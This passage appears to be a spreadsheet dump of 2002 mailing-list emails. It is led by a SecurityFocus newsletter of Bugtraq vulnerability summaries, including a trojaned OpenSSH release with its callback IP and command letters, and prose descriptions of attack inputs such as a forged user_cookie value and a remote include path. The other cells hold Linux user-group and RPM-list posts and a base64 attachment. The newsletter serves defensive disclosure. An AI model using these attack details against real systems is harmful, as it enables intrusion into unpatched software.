enforcement legislation may allow the powerful\nentertainment lobby to circumvent fundamental constitutional protections,\nand may create chaos on the Internet.\n\n[URL]http://online.securityfocus.com[/URL]\n\n4. SecurityFocus DPP Program\n\nAttention Non-profit Organizations and Universities!!\nSign-up now for preferred pricing on the only global early-warning system\nfor cyber attacks - SecurityFocus DeepSight Threat Management System.\n\nClick here for more information:\n[URL]http://www.securityfocus.com[/URL]\n\n\nII. BUGTRAQ SUMMARY\n-------------------\n1. OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability\nBugTraq ID: 5363\nRemote: Yes\nDate Published: Jul 30 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nOpenSSL is an open source implementation of the SSL protocol. It is used\nby a number of other projects, including but not restricted to Apache,\nSendmail, Bind, etc.. It is commonly found on Linux and Unix based\nsystems.\n\nA buffer overflow vulnerability has been reported in some versions of\nOpenSSL.\n\nWhen initiating an OpenSSL session, some information is shared between the\nclient and the server, including key data. The reported vulnerability lies\nin the handling of the client key value during the negotiation of the\nSSLv2 protocol.\n\nA malicious client may exploit this vulnerability by transmitting a\nmalformed key to the vulnerable server. Careful exploitation may result in\nexecution of arbitrary code as the server process, and the attacker\ngaining local access to the vulnerable system. More primitive attacks may\nresult in the server process crashing, possibly producing a denial of\nservice condition.\n\nThe consequences of exploitation may vary with the nature of the\napplication using OpenSSL.\n\nOracle reports that CorporateTime Outlook Connector is only vulnerable\nunder Microsoft Windows 98, NT, 2K, and XP.\n\n** This vulnerability was originally part of BID 5353, Multiple OpenSSL\nBuffer Overflow Vulnerabilities. It has now been reissued as a separate\nvulnerability.\n\n2. Abyss Web Server HTTP GET Request Directory Contents Disclosure Vulnerability\nBugTraq ID: 5345\nRemote: Yes\nDate Published: Jul 29 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nAbyss Web Server is a freely available personal web server. It is\nmaintained by Aprelium Technologies and runs on Microsoft Windows\noperating systems, as well as Linux.\n\nA vulnerability has been reported for Abyss Web Server 1.0.3 running on a\nMicrosoft Windows platform. It is possible for an attacker to make a\nrequest such that the contents of the specified directory are revealed.\n\nThe vulnerability occurs due to the manner in which excessive '/'\ncharacters are handled in web requests. An attacker making a GET request\nfollowed by 256 '/' characters will cause Abyss Web Server to return an\nerror page containing the directory listing of the specified directory.\n\nAn attacker may be able to use this information to launch further,\npotentially damaging attacks, against a vulnerable system.\n\n3. DotProject User Cookie Authentication Bypass Vulnerability\nBugTraq ID: 5347\nRemote: Yes\nDate Published: Jul 29 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\ndotproject is web-based project management software, written in PHP.  It\nis designed to run on Unix and Linux variants.\n\ndotproject is prone to an issue which may allow remote attackers to bypass\nauthentication and gain administrative access to the software.\n\nThis may be accomplished by submitting a maliciously crafted 'user_cookie'\nvalue either manually or via manipulation of URI parameters.  For example,\nthe attacker may manually craft a cookie with a 'user_cookie' value of 1\nand submit it to the project management system.  An attacker may also\nsubmit a malicious web request with the 'user_cookie' URI parameter set to\n1.  In both instances, the attacker will gain administrative access to the\nproject management system.\n\nThis problem is due to the software relying on the 'user_cookie' value to\nauthenticate the user.\n\n4. OpenSSL SSLv3 Session ID Buffer Overflow Vulnerability\nBugTraq ID: 5362\nRemote: Yes\nDate Published: Jul 30 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nOpenSSL is an open source implementation of the SSL protocol. It is used\nby a number of other projects, including but not restricted to Apache,\nSendmail, Bind, etc.. It is commonly found on Linux and Unix based\nsystems.\n\nA vulnerability has been reported for OpenSSL. The vulnerability affects\nSSLv3 session IDs.\n\nWhen initiating contact with SSLv3 servers, clients and servers alike\nexchange information. Session information is stored in a session key with\na unique session ID.\n\nReportedly when a an oversized SSL version 3 session ID is supplied to a\nclient from a malicious server, it is possible to overflow a buffer on the\nremote system. This could result in key memory areas on the vulnerable,\nremote system being overwritten, including stack frame data.\n\nAn attacker may be able to take advantage of this vulnerability to execute\nmalicious code on a vulnerable SSLv3 client machine.\n\nOracle reports that CorporateTime Outlook Connector is only vulnerable\nunder Microsoft Windows 98, NT, 2K, and XP.\n\n** This vulnerability was originally part of BID 5353, Multiple OpenSSL\nBuffer Overflow Vulnerabilities. It has now been reissued as a separate\nvulnerability.\n\n5. phpBB2 Gender Mod Remote SQL Injection Vulnerability\nBugTraq ID: 5342\nRemote: Yes\nDate Published: Jul 29 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nphpBB2 is an open-source web forum application that is written in PHP and\nbackended by a number of database products. It will run on most Unix and\nLinux variants, as well as Microsoft Windows operating systems.\n\nGender Mod is a modification for phpBB2 which allows the association of a\ngender with a given user profile. A SQL injection vulnerability has been\nreported in this mod.\n\nA malicious user may modify the specified value for 'gender' when updating\ntheir profile. It is possible to include additional SQL statements in this\nstring, and subvert the SQL statement used to update the user profile.\n\nIt has been reported possible to gain administrative access to the phpBB2\nsite through exploitation of this issue. Other attacks may be possible,\nincluding the ability to view sensitive database information or to modify\nadditional information stored in the database.\n\n6. ShoutBox Form Field HTML Injection Vulnerability\nBugTraq ID: 5354\nRemote: Yes\nDate Published: Jul 29 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nshoutBOX is web-based user feedback software.  It is written in PHP and\nruns on Unix and Linux variants as well as Microsoft Windows operating\nsystems.\n\nShoutBox does not sufficiently sanitize HTML tags from input supplied via\nform fields.  In particular, the user website URL field of the feedback\nform is not sanitized of HTML tags.\n\nAttackers may exploit this lack of input validation to inject arbitrary\nHTML and script code into pages that are generated by the script.  This\nmay result in execution of attacker-supplied code in the web client of a\nuser who visits such a page.  HTML and script code will be executed in the\nsecurity context of the site hosting the software.\n\nThis condition may be exploited to hijack web content or potentially steal\ncookie-based authentication credentials.\n\n7. Sympoll File Disclosure Vulnerability\nBugTraq ID: 5360\nRemote: Yes\nDate Published: Jul 30 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nSympoll is web-based voting booth software.  It is implemented in PHP and\nwill run on most Unix and Linux variants as well as Microsoft Windows\noperating systems.\n\nSympoll is prone to an issue which may allow remote attackers to disclose\nthe contents of arbitrary webserver readable files.  This vulnerability is\nonly present on hosts which are running the vulnerable version of the\nsoftware and have the PHP 'register_globals' directive enabled.  The\nsource of this vulnerability is reported to be insufficient integrity\nchecking of variables.\n\nThe vendor has stated that this issue is only believed to affect Sympoll\nversion 1.2.\n\nExploitation of this issue on Microsoft Windows operating systems may\npotentially expose arbitrary system files since webservers typically run\nin the SYSTEM context.\n\n8. OpenSSL ASN.1 Parsing Error Denial Of Service Vulnerability\nBugTraq ID: 5366\nRemote: Yes\nDate Published: Jul 30 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nOpenSSL is an open source implementation of the SSL protocol.  It is used\nby a number of other projects, including but not restricted to Apache,\nSendmail, Bind, etc..  It is commonly found on Linux and Unix based\nsystems.\n\nA remotely exploitable denial of service condition has been reported in\nthe OpenSSL ASN.1 library.\n\nThis vulnerability is due to parsing errors and affects SSL, TLS, S/MIME,\nPKCS#7 and certificate creation routines.  In particular, malformed\ncertificate encodings could cause a denial of service to server and client\nimplementations which depend on OpenSSL.\n\nOracle reports that CorporateTime Outlook Connector is only vulnerable\nunder Microsoft Windows 98, NT, 2K, and XP.\n\n** This vulnerability was originally part of BID 5353, Multiple OpenSSL\nBuffer Overflow Vulnerabilities. It has now been reissued as a separate\nvulnerability.\n\n9. William Deich Super SysLog Format String Vulnerability\nBugTraq ID: 5367\nRemote: No\nDate Published: Jul 31 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nsuper is an open source set-uid root utility that allows for a similar\nfunctionality to that of the sudo utility. It is written for use on Linux\nand Unix variant operating systems.\n\nsuper is prone to a format string vulnerability. This problem is due to\nincorrect use of the syslog() function to log error messages. It is\npossible to corrupt memory by passing format strings through the\nvulnerable logging function. This may potentially be exploited to\noverwrite arbitrary locations in memory with attacker-specified values.\n\nThe vulnerability is a result of compiling super with syslog support. Due\nto an error in the file, error.c, users that are not in the super\nconfiguration file will still be able to execute code with root\nprivileges.\n\nSuccessful exploitation of this issue may allow the attacker to execute\narbitrary instructions with root privileges.\n\n10. Frederic Tyndiuk Eupload Plain Text Password Storage Vulnerability\nBugTraq ID: 5369\nRemote: Yes\nDate Published: Jul 31 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nFrederic Tyndiuk Eupload is a small script designed to facilitate\nuploading of files to a remote server. It is written in Perl and should\nwork with Microsoft Windows and Linux and Unix variant operating systems.\n\nA problem with Eupload 1.0 may make it possible for remote attackers to\ngain access to sensitive information.\n\nEupload does not cryptographically protect stored passwords. Passwords\ncontained in the configuration file, password.txt, are stored in plain\ntext. They may be read by simply viewing the file. The file, password.txt,\nis stored in a web accessible location and is, itself, accessible for\nretrieval. Thus it is trivial for an attacker to obtain user passwords and\nabuse the Eupload service.\n\nThis problem could allow an attacker to gain access to the passwords to\nprotected resources.\n\n11. Util-linux File Locking Race Condition Vulnerability\nBugTraq ID: 5344\nRemote: No\nDate Published: Jul 29 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nThe util-linux package is a set of commonly used system utilities such as\n'chfn' and 'chsh'.  It is included with many Linux distributions.\n\nA race condition has been reported in code shared by the util-linux\nutilities.  The condition is related to file locking.  Failure to check\nfor the existence of a lockfile prior to sensitive operations may, under\nspecific circumstances, open a window of opportunity for attack.  The\nutil-linux utilities often write to sensitive files such as /etc/passwd/.\nAttackers may exploit the condition to inject arbitrary data into these\nfiles to elevate privileges.\n\nThe reported attacks are complex, time dependent and require specific\ncircumstances such as system administrator interaction and a large passwd\nfile.\n\nRed Hat Linux is known to ship with util-linux as a core component.\nOther distributions, those that are derived from Red Hat in particular,\nmay also be vulnerable.\n\nIt should be noted that the utilities included with the shadow-utils\npackage (shipped with SuSE Linux) are not vulnerable.\n\n12. OpenSSL Kerberos Enabled SSLv3 Master Key Exchange Buffer Overflow Vulnerability\nBugTraq ID: 5361\nRemote: Yes\nDate Published: Jul 30 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nOpenSSL is an open source implementation of the SSL protocol. It is used\nby a number of other projects, including but not restricted to Apache,\nSendmail, Bind, etc.. It is commonly found on Linux and Unix based\nsystems.\n\nA vulnerability has been reported for OpenSSL 0.9.7 pre-release versions.\n\nThis vulnerability is present only when Kerberos is enabled for a system\nusing SSL version 3.\n\nWhen initiatiating contact between a SSLv3 server, master keys are\nexchanged between the client and the server. When an oversized master key\nis supplied to a SSL version 3 server by a malicious client, it may cause\na buffer to overflow on the vulnerable system. As a result, stack memory\non the vulnerable server will become corrupted. This could enable the\nattacker to take control of the SSLv3 server process and cause it to\nexecute malicious, attacker supplied code.\n\n** This vulnerability was originally part of BID 5353, Multiple OpenSSL\nBuffer Overflow Vulnerabilities. It has now been reissued as a separate\nvulnerability.\n\n13. OpenSSL ASCII Representation Of Integers Buffer Overflow Vulnerability\nBugTraq ID: 5364\nRemote: Yes\nDate Published: Jul 30 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nOpenSSL is an open source implementation of the SSL protocol.  It is used\nby a number of other projects, including but not restricted to Apache,\nSendmail, Bind, etc..  It is commonly found on Linux and Unix based\nsystems.\n\nRemotely exploitable buffer overflow conditions have been reported in\nOpenSSL.  This issue is due to insufficient checking of bounds with\nregards to ASCII representations of integers on 64 bit platforms.  It is\npossible to overflow these buffers on a vulnerable system if overly large\nvalues are submitted by a malicious attacker.\n\nExploitation of this vulnerability may allow execution of arbitrary code\nwith the privileges of the vulnerable application, service or client.\n\nOracle reports that CorporateTime Outlook Connector is only vulnerable\nunder Microsoft Windows 98, NT, 2K, and XP.\n\n** This vulnerability was originally part of BID 5353, Multiple OpenSSL\nBuffer Overflow Vulnerabilities. It has now been reissued as a separate\nvulnerability.\n\n14. ParaChat Phantom User Denial Of Service Vulnerability\nBugTraq ID: 5370\nRemote: Yes\nDate Published: Jul 31 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nParaChat is a web-based chatting system.  It is available for most Unix\nand Linux variants as well as Microsoft Windows operating systems.\n\nParaChat chat servers are prone to a denial of service condition.\n\nIf a user has left the webpage for a chat room using the Back or Forward\nbuttons of their browser in lieu of logging out, their account will still\nbe logged into the chat room until it times out 15 minutes later.  A\nmalicious user may do this repeatedly as different users to overload the\nchat server with "phantom" users.  A denial of service may be the result.\n\n15. OpenSSH Trojan Horse Vulnerability\nBugTraq ID: 5374\nRemote: Yes\nDate Published: Aug 01 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nOpenSSH is a freely available implementation of the SSH client-server\nprotocol. It is distributed and maintained by the OpenSSH team.\n\nReportedly, the server hosting openssh, ftp.openbsd.org, was compromised\nrecently. It has been reported that the intruder made modifications to the\nsource code of openssh to include trojan horse code. Downloads of the\nopenssh source code from ftp.openbsd.org between July 30, 2002 and July\n31, 2002 likely contain the trojan code.\n\nThe trojan code appears to be included in the file, bf-test.c. Reports say\nthat the trojan will run once upon compilation of openssh. The trojan\nprocess is named 'sh' or the compiling user's default shell. Once executed\nthe trojan attempts to connect to 203.62.158.32 on port 6667. The trojan\nwill then wait for one of three commands. A connection to the specified\naddress is attempted once every hour.\n\n'D' will cause the trojan to execute '/bin/sh'. 'M' will cause the trojan\nto respawn and 'A' will terminate the trojan process. It is highly\nprobable that this trojan will give remote root access to vulnerable\nsystems.\n\nThe following sites also have been reported to carry the trojaned version of openssh-3.4p1.tar.gz:\nftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/\nftp://ftp.usa.openbsd.org/pub/OpenBSD/OpenSSH/\nftp://ftp1.se.openbsd.org/pub/OpenBSD/OpenSSH/\n\nIt is not known whether other sites are affected as well.\n\nFreeBSD has reported the following MD5 checksum information. The following\nis the MD5 checksum of the trojaned version of openssh: MD5\n(openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57\n\nThe following is the MD5 checksum of openssh in the FreeBSD ports\ndirectory: MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8\n\nNote that a different checksum does not mean the backdoor does not exist.\n\n*** The OpenSSH team has released an advisory. Fixed versions of openssh\nare available for download since 1300 UTC August 1, 2002. The following\nMD5 checksum information was provided for fixed versions of openssh:\n\nMD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8\nMD5 (openssh-3.4p1.tar.gz.sig) = d5a956263287e7fd261528bb1962f24c\nMD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2\nMD5 (openssh-3.2.2p1.tar.gz) = 9d3e1e31e8d6cdbfa3036cb183aa4a01\nMD5 (openssh-3.2.2p1.tar.gz.sig) = be4f9ed8da1735efd770dc8fa2bb808a\n\n16. Bharat Mediratta Gallery Remote File Include Vulnerability\nBugTraq ID: 5375\nRemote: Yes\nDate Published: Aug 01 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nGallery is an open source web based photo album. It is written in PHP and\nis available for Linux and Unix variant as well as Microsoft Windows\noperating systems.\n\nGallery is prone to an issue which may allow remote attackers to include\narbitrary files located on remote servers. This issue is present in the\nfollowing PHP script files provided with Gallery: errors/configmode.php\nerrors/needinit.php errors/reconfigure.php errors/unconfigured.php\ncaptionator.php\n\nAn attacker may exploit this by supplying a path to a file, 'init.php', on\na remote host as a value for the 'GALLERY_BASEDIR' parameter.\n\nIf the remote file is a PHP script, this may allow for execution of\nattacker-supplied PHP code with the privileges of the webserver.\nSuccessful exploitation may provide local access to the attacker.\n\n17. John G. Myers MUnpack Malformed MIME Encoded Message Buffer Overflow Vulnerability\nBugTraq ID: 5385\nRemote: No\nDate Published: Aug 02 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nJohn G. Myers mpack/munpack is a pair of utilities to encode and decode\nMIME format email. Versions are available for Linux and Unix variant\noperating systems as well as Microsoft DOS.\n\nA buffer overflow vulnerability has been reported for munpack 1.5.\nReportedly, it is possible to cause munpack to crash when it receives a\nmalformed email or NNTP news article.\n\nAs this vulnerability is the result of a buffer overflow condition, it may\nbe possible for an attacker to cause munpack to execute malicious attacker\nsupplied code. This has not, however, been confirmed.\n\n18. Dispair Remote Command Execution Vulnerability\nBugTraq ID: 5392\nRemote: Yes\nDate Published: Jul 30 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nDispair is a web-based .tar.gz archive viewer.  It is written in Perl and\nis available for Linux and Unix operating systems.\n\nDispair fails to sufficiently validate user-supplied input before it is\npassed to the shell via the Perl open() function.  A remote attacker may\nexploit this condition by injecting arbitrary commands into CGI parameters\nin a request to the vulnerable script.\n\nThe result of successful exploitation is that attackers may potentially\nexploit this issue to execute arbitrary commands on the underlying shell\nwith the privileges of the webserver process.\n\n19. Mailreader Session Hijacking Vulnerability\nBugTraq ID: 5393\nRemote: Yes\nDate Published: Aug 02 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nMailreader is an open source project which allows POP3 mail access through\na web interface. Mailreader is implemented in Perl, and should work under\nMicrosoft Windows, Linux and other Unix based operating systems.\n\nA vulnerability has been reported in some versions of Mailreader. It may\nbe possible for a remote attacker to hijack the session of a legitimate\nuser of the system. This may result in access to sensitive information, or\nthe ability to send mail and otherwise function as the legitimate user.\n\nFull exploit details are not available. It is possible that this\nvulnerability results from session information being tracked through CGI\nparameters, which may be trivially spoofed by a remote user. This\npossibility has not, however, been confirmed.\n\n20. John G. Myers MPack/MUnpack Malformed Filename Vulnerability\nBugTraq ID: 5386\nRemote: No\nDate Published: Aug 02 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nJohn G. Myers mpack/munpack is a pair of utilities to encode and decode\nMIME format email. Versions are available for Linux and Unix variant\noperating systems as well as Microsoft DOS.\n\nA vulnerability has been reported for mpack/munpack 1.5. Reportedly, it is\npossible to cause munpack to create files outside of a designated\ndirectory. When mpack/munpack receives a MIME encoded message with an\nattachment that refers to a file, using a '../' sequence followed by the\nfilename, it may decode the attachment outside of a designated directory.\n\nThe impact of this vulnerability is limited as it has been reported that\nmunpack will only accept a single '../' sequence and will not overwrite\nany existing files.\n\n21. Fake Identd Client Query Remote Buffer Overflow Vulnerability\nBugTraq ID: 5351\nRemote: Yes\nDate Published: Jul 29 2002 12:00AM\nRelevant URL:\n[URL]http://www.securityfocus.com[/URL]\nSummary:\n\nFake Identd is an open source Ident server designed to return the same\ninformation to all incoming requests. It is implemented by Tomi Ollila,\nand available for Linux and a number of other Unix based operating\nsystems.\n\nReportedly, some versions of Fake Identd fail to properly handle long\nclient requests. A specially formatted request split across multiple TCP\npackets may cause an internal buffer to overflow. Reportedly, execution of\narbitrary code as the Fake Identd server process is possible.\n\nFake Identd is designed to drop privileges. However, it has also been\nreported that this behavior is flawed in some versions. As a result,\nexploitation may result in the execution of code with root privileges.\n\n\nIII. LINUX FOCUS LIST SUMMARY\n---------------------------------\n1. LDAP Auth? (Thread)\nRelevant URL:\n\n[URL]http://online.securityfocus.com[/URL]\n\n2. LDAP auth (Thread)\nRelevant URL:\n\n[URL]http://online.securityfocus.com[/URL]\n\n3. Administrivia: Gone Fishin' (Thread)\nRelevant URL:\n\n[URL]http://online.securityfocus.com[/URL]_x0018_\n\n\nIV. NEW PRODUCTS FOR LINUX PLATFORMS\n------------------------------------\n1. Gateway Guardian\nby NetMaster Networking Solutions, Inc.\nPlatforms: Linux\nRelevant URL:\n[URL]http://www.netmaster.com[/URL]\nSummary:\n\nDeveloped with NetMaster's own Linux distribution tailored specifically\nfor firewall applications, Gateway Guardian is a very flexible, high-end\nfirewall that takes a revolutionary approach to allowing a company to use\na lower-end PC as their Internet gateway. Running on a PC that is not the\nInternet gateway, Gateway Guardian uses a pure Java application to\npreconfigure hardware, Internet provider settings, and firewall rules\nthrough a wizard like format. When the information has been entered, the\nJava application writes an entire Linux operating system and the custom\nfirewall configuration onto a 3-1/4" floppy diskette.\n\n2. PakSecured Linux\nby Paktronix Systems\nPlatforms: Linux\nRelevant URL:\n[URL]http://www.paktronix.com[/URL]\nSummary:\n\nPakSecured Linux PakSecured Linux is currently the only complete Policy\nRouting Operating System with a broad computing platform base. Based on\nthe Linux OS, PakSecured Linux runs on all processor families capable of\nrunning the Linux kernel. Policy Routing encompasses Quality of Service\n(QoS), Advanced TCP/IP routing of IPv4 and IPv6, IPSec encryption and VPN\nstructures, Bandwidth Allocation and Traffic Shaping, and Address\nAllocation features such as NAT and IP Masquerade. While these features\nare available independently in various products, PakSecured Linux\nimplements the full range of Policy Routing. All of these features are\nintegrated into a hardened OS distribution designed to operate in hostile\nnetwork environments. PakSecured Linux has no desktop or user based\nfunctionality and is specifically targeted at servers with a need for high\nsecurity, 24x7 uptime, and which are required to run without operator\nintervention. Coupling these needs with the flexibility and power of a\ncomplete Policy Routing structure puts PakSecured Linux into a unique\nniche.\n\n3. Progressive Systems VPN\nby Progressive Systems\nPlatforms: Linux, Propietary Hardware\nRelevant URL:\n[URL]http://www.progressive-systems.com[/URL]\nSummary:\n\nProgressive Systems VPN is a remote access VPN designed to let you quickly\nand securely allow remote network access to whomever you choose, and to\nonly those you allow. Progressive Systems VPN features SmartGate from\nV-One. SmartGate is the market share leading extranet VPN product now\navailable for Linux or as an appliance through Progressive Systems.\n\n\nV. NEW TOOLS FOR LINUX PLATFORMS\n--------------------------------\n1. Astaro Security Linux (Stable 3.x) v3.202\nby astaro\nRelevant URL:\n[URL]http://www.astaro.com[/URL]\nPlatforms: Linux, POSIX\nSummary:\n\nAstaro Security Linux is a firewall solution. It does stateful packet\ninspection filtering, content filtering, user authentication, virus\nscanning, VPN with IPSec and PPTP, and much more. With its Web-based\nmanagement tool, WebAdmin, and the ability to pull updates via the\nInternet, it is pretty easy to manage. It is based on a special hardened\nLinux 2.4 distribution where most daemons are running in change-roots and\nare protected by kernel capabilities.\n\n2. FCheck 2.07.59\nby Michael A. Gumienny\nRelevant URL:\n[URL]http://www.geocities.com[/URL]\nPlatforms: AIX, BSDI, DG-UX, Digital UNIX/Alpha, FreeBSD, HP-UX, Linux,\nNetBSD, OpenBSD, Perl (any system supporting perl), SCO, Solaris, SunOS,\nUNIX, Unixware, Windows 2000, Windows 3.x, Windows 95/98, Windows NT\nSummary:\n\nFCHECK is a very stable PERL script written to generate and comparatively\nmonitor a UNIX system against its baseline for any file alterations and\nreport them through syslog, console, or any log monitoring interface.\nMonitoring events can be done in as little as one minute intervals if a\nsystem's drive space is s</t>
  </si>
  <si>
    <t>http://www.securityfocus.com http://online.securityfocus.com http://online.securityfocus.com http://online.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www.securityfocus.com http://online.securityfocus.com http://online.securityfocus.com http://online.securityfocus.com http://www.netmaster.com http://www.paktronix.com http://www.progressive-systems.com http://www.astaro.com http://www.geocities.com http://www.atstake.com http://www.securityfocus.com</t>
  </si>
  <si>
    <t>To: "Declan Houlihan" &lt;deccy@csn.ul.ie&gt;, &lt;ilug@linux.ie&gt;\nFrom: "Matthew French" &lt;mfrench42@yahoo.co.uk&gt;\nDate: Tue, 6 Aug 2002 09:46:27 +0100</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 09:46:27 +0100</t>
  </si>
  <si>
    <t>"Declan Houlihan" &lt;deccy@csn.ul.ie&gt;, &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] Sparc Solaris (was: Dell GX260 V Redhat 7.3)</t>
  </si>
  <si>
    <t>Declan Houlihan mentioned:\n&gt; We're actually investigating switching from Sparc/Solaris to\n&gt; Intel/Linux.\n\nAnd then:\n&gt; At the moment at work, if we want a new workstation, we just\n&gt; buy whatever Sun's latest system is, we jumpstart it, and\n&gt; that's it, it's up and running.\n\nWell, why not try Linux on Sparc. It works pretty well and I have not had\nmajor issues with it. There are minor problems: like the serial console\ndrivers, but for workstation installs I suspect it will work fine.\n\nAnd you get a working version of your favourite KDE/Gnome desktop instead of\nDTE, uhm, I mean CDE.\n\n&gt; Basically the whole installation procedure is\n&gt; "boot net - install"\n\nWell, you have to add the workstation to the install server first.\n\nTalking of which, you can install Sparc Linux using this technique as well.\nThe image takes a while to load, but once this is done you can install in\nthe normal fashion.\n\nSuSe for Sparc works fine. I am using Debian because the Sun boxen I have\nsubverted do not have graphics consoles. It also just works.\n\nIf you have a spare workstation, I am sure I could burn a couple of CD's for\nyou. (If I can find them.)\n\n- Matthew\n\n\n__________________________________________________\nDo You Yahoo!?\nEverything you'll ever need on one web page\nfrom News and Sport to Email and Music Charts\n[URL]http://uk.my.yahoo.com[/URL]\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://uk.my.yahoo.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Tue, 30 Jul 2002 22:52:37 +0200</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 22:52:37 +0200</t>
  </si>
  <si>
    <t>Re: Installing RPM</t>
  </si>
  <si>
    <t>Once upon a time, Manfred wrote : &gt; I would like to install RPM itself. I have tried to get the information &gt; by visiting [URL]www.rpm.org[/URL]   and the related links they &gt; give but they all seems to assume that RPM already is installed. &gt; I have a firewall based on linux-2.2.20 (Smoothwall) for private use. &gt; I would like to install the RPM package/program but there is no &gt; information how to do this from scratch. &gt; Found this site and hopefully some have the knowledge. &gt; Best regards Manfred Grobosch Well, you can simply use an rpm tarball (or extract one from a source rpm on a machine that has rpm scripts install "rpm2cpio  | cpio -dimv" and "./configure &amp;&amp; make &amp;&amp; make install" as usual. You need db3 or db4 development files at least, and once everything installed you'll need to initialize your rpm database. If you need more help, I suggest you join the rpm-list@redhat.com by subscribing at [URL]https://listman.redhat.com[/URL] Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>www.rpm.org https://listman.redhat.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: "Rpm-List" &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: "Manfred Grobosch" &lt;mangro@home.se&gt;\nDate: Tue, 30 Jul 2002 22:22:24 +0200</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 22:22:24 +0200</t>
  </si>
  <si>
    <t>"Manfred Grobosch" &lt;mangro@home.se&gt;</t>
  </si>
  <si>
    <t>"Rpm-List" &lt;rpm-zzzlist@freshrpms.net&gt;</t>
  </si>
  <si>
    <t>Installing RPM</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_0002_01C23817.94245ED0 Content-Type: text/plain; 	charset="iso-8859-1" Content-Transfer-Encoding: 7bit I would like to install RPM itself. I have tried to get the information by visiting [URL]www.rpm.org[/URL]   and the related links they give but they all seems to assume that RPM already is installed. I have a firewall based on linux-2.2.20 (Smoothwall) for private use. I would like to install the RPM package/program but there is no information how to do this from scratch. Found this site and hopefully some have the knowledge. Best regards Manfred Grobosch ------=_NextPart_000_0002_01C23817.94245ED0 Content-Type: application/ms-tnef; 	name="winmail.dat" Content-Transfer-Encoding: base64 Content-Disposition: attachment; 	filename="winmail.dat" eJ8+IhgUAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEGgAMADgAAANIHBwAeABYAFgAAAAIALAEB A5AGAJwgAAAiAAAACwACAAEAAAALACMAAAAAAAMAJgAAAAAACwApAAAAAAADADYAAAAAAB4AcAAB AAAADwAAAEluc3RhbGxpbmcgUlBNAAACAXEAAQAAABYAAAABwjgGzgGh9X7AS3xFQIvzXQmFq5EM AAACAR0MAQAAABQAAABTTVRQOk1BTkdST0BIT01FLlNFAAsAAQ4AAAAAQAAGDgAkRMIGOMIBAgEK DgEAAAAYAAAAAAAAAKdrOPJjFlRMtDT3NxD6pe/CgAAACwAfDgEAAAACAQkQAQAAALAcAACsHAAA pmsAAExaRnWNoAB2AwAKAHJjcGcxMjVyMgxgYzEDMAEHC2BukQ4QMDUzDxZmZQ+STwH3AqQDYwIA Y2gKwHOEZXQC0XBycTIAAJIqCqFubxJQIDAB0JEB0DYwMw+gMDQUIfMB0BQQNH0HbQKDAFAD1PsR /xMLYhPhFFATshj0FNBfBxMCgw5QBFUWvTES/Df9FAE5E6MUchRQFNAIVQey/wKDD8ARnRpRF34U MBQwD5CfAdAPkBzAE/AdQjd9BrT9HpQ0Fk8gDxhnFBQY0hTQqlYEkGQAcGEelDUe/xQzOCREIAdt IENFPR6UNiePFEAovynFeXLnHpQooRGsMTYWMSwPA4KqRwnRax6UOS3/Nh/1PS+PVAhwAoMUUDFf NzdDMo8pxChIZWIJcHf+KTQkFjE0viivNsYHEAGg7w3gN6UaUS4dOCqhOX8DgvpCB0B0DeA0JB7h 